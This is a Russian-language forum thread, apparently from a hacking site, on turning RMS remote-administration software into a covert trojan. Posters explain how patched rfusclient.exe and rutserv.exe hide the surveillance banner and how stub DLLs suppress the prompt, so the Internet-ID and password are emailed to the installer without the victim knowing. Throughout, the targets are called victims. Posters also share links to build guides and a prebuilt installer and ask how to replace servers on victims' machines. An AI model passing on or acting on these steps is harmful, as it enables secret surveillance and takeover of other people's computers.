RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. scandalist
    scandalist Новичок
    Симпатии:
    3
    Проверил запись с камеры на оригинальном сервере. Пишу Win7 с WinXP.
    Звук и видео или только видео пишет 40 секунд из 10 минут. Только звук пишется нормально. Когда пишу с Win7 на Win7, даже локально, максимум 2-3 минуты. Там, правда оперативы побольше и машинка помощнее.
    Так что патч сервера не влияет на это.

Последнее редактирование: 21 май 2012
    21 май 2012
  2. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Может это как то связанно с ограничением трафика через id соединение?

21 май 2012
  3. incode
    incode Banned
    Симпатии:
    16
    PilotKaa,
    Нет просто РМС кривая прога

21 май 2012
  4. scandalist
    scandalist Новичок
    Симпатии:
    3
    Через IP подключаюсь.

21 май 2012
  5. incode
    incode Banned
    Симпатии:
    16
    scandalist,
    Напиши на форуме производителя, послушаем что скажут разработчики

21 май 2012
  6. hik200
    hik200 Новичок
    Симпатии:
    0
    Люди я не понимаю что скачивать основной архив уже не скачать что дальше????

21 май 2012
  7. scandalist
    scandalist Новичок
    Симпатии:
    3
    Лень мне регистрироваться там. Да и смысла нет, эта проблема всплыла на первой же странице в теме "Обсуждение бета версии 5.1.3". Разработчики обещали поправить, сошлись на том, что webm кодек хороший, но directx обвязка подкачала.

Ахтунг
    По непонятной причине в выложенном мной патченном сервере 5.2 rfusclient.exe оказался без патча. На некоторых системах может вылезти баннер.
    Исправленно.

Последнее редактирование: 22 май 2012
    22 май 2012
  8. nonamed
    nonamed Новичок
    Симпатии:
    0
    Что-то я запутался. Ранее выложены патченые версии rfusclient.exe и rutserv.exe для RMS 5.2. Как я понял из сообщений саламандры на другом форуме, для сокрытия сообщений и всяких подтверждений требуются дополнительные длл-ки в рабочей папке программы.
    Значит, патченые екзеки обращаются к этим dll, значит есть их (dll то есть) нужно включить в установочный msi + заменить rfusclient.exe и rutserv.exe патчеными (в этом же msi)? Да, если так, то подходят ли dll с предыдущих сборок для версии 5.2?

Добавлено через 4 минуты
    Или просто объясните (ткните), пожалуйста, что именно пропатчено в rfusclient.exe и rutserv.exe и какие функции выполняют dll в выложенных ранее готовых дистрибутивах, далее надеюсь сам дотумкаю. Заранее спасибо. :thx:

22 май 2012
  9. scandalist
    scandalist Новичок
    Симпатии:
    3
    1. Баннер о видеонаблюдении при включении камеры - патченные файлы сервера.
    2. У жертвы окно с запросом на отправку InternetID вот на этот email после установки сервера из msi пакета - заглушки в виде системных dll в составе пересобранного msi инсталятора, убирают окно на 7 и XP. DLL из предыдущих сборок подходят к 5.2

22 май 2012
  10. nonamed
    nonamed Новичок
    Симпатии:
    0
    Ясно. То есть, достаточно просто включить в инсталляционный пакет две dll и заменить exe-ки.

Последнее редактирование: 23 май 2012
    22 май 2012
  11. blackunder
    blackunder Новичок
    Симпатии:
    2
    Пипл а как собрать новую беспалевную сборку ? также как описанно в тебе только сервер поменять ? у меня 5.1 б1 собрать поновому и всё ? ПОМОГИТЕ МНЕ ХЭЛППП
    ?

Последнее редактирование: 23 май 2012
    22 май 2012
  12. bllynx
    bllynx Новичок
    Симпатии:
    0
    парни а что случилось уже как дней пять не работает подключение по ID/facepalm
    подскажите плиз что делать как все исправить?

23 май 2012
  13. nonamed
    nonamed Новичок
    Симпатии:
    0
    blackunder.
    По первой ссылке найдешь как сделать свой патченный сервер msi с замененными файлами и убранными окошками (прочитай все комментарии).
    1. http://www.xaker.name/forvb/showthread.php?t=25455
    По второй - как использовать полученный сервер для создания тихой сборки со своими настройками.
    2. http://www.xaker.name/forvb/showpost.php?p=172599&postcount=711

Добавлено через 10 минут
    Вместо первой ссылки можешь взять мою версию msi, но она шесть с половиной метров, я хз как меньше сделать (делал по инструкции vlader).
    http://zalil.ru/33295931

Добавлено через 1 час 1 минуту
    Что-то я немного туплю с чекером (не люблю win-скрипты).
    Содержимое firstrun.js:

Содержимое check.bat:

Содержимое checkrun.js:

Содержимое install.cmd, из которого все это запускается:

Кто-нибудь может подсказать, в чем проблема? Если устанавливаю при подключенном интернете - все норм. Если при отключенном + после запуска install.cmd ребут и только после ребута конект к интернету то не устанавливается сам рмс. В temp все копируется. При ручном запуске firstrun.js вроде бы нормально тоже проходит установка.

Добавлено через 1 час 26 минут
    Нашел сам. В checkbat.cmd было

стало
    Теперь в шедулер все добавляется, но при запуске системы выполнение checkrun зависает с кодом 0x41301(задание выполняется и ппц).

Последнее редактирование: 24 май 2012
    24 май 2012
  14. blackunder
    blackunder Новичок
    Симпатии:
    2
    wald у меня такая же фигня .. никому не закидываю но на мыло приходят ..

24 май 2012
  15. Hendrix
    Hendrix Новичок
    Симпатии:
    0
    Случилась проблема - не коннектит к серверу жертвы...скорее всего забанили ключ...подскажите, пожалуйста, как собрать новый сервер, чтоб он при запуске на компьютере жертвы вначале остановил и удалил старый серв, а только потом установил новый...заранее спасибо...:thx:

24 май 2012
  16. nonamed
    nonamed Новичок
    Симпатии:
    0
    Проблема с проверкой установщиком интернета решилась указанием везде полного пути к каждому файлу.

24 май 2012
  17. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Сделал так>>открыл инстал шилдом>>добавил 2 файла oledlg.dll rasadhlp.dll запаковал кинул в папку selfinstal.Установилось без палева на ящик логин пас скинулся,но вот баннер видео наблюдения всеравно вылазит.

24 май 2012
  18. nonamed
    nonamed Новичок
    Симпатии:
    0
    Потому что баннер отключается в измененных rfusclient.exe и rutserv.exe.

25 май 2012
  19. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Значит эти 2 дллки можно не сувать в сборку?

25 май 2012
  20. vlader
    vlader Guest
    PilotKaa, если тебе не важно, что будет появляться окно об отправке ID, то можешь не засовывать.

25 май 2012
Статус темы:
Закрыта.
Загрузка...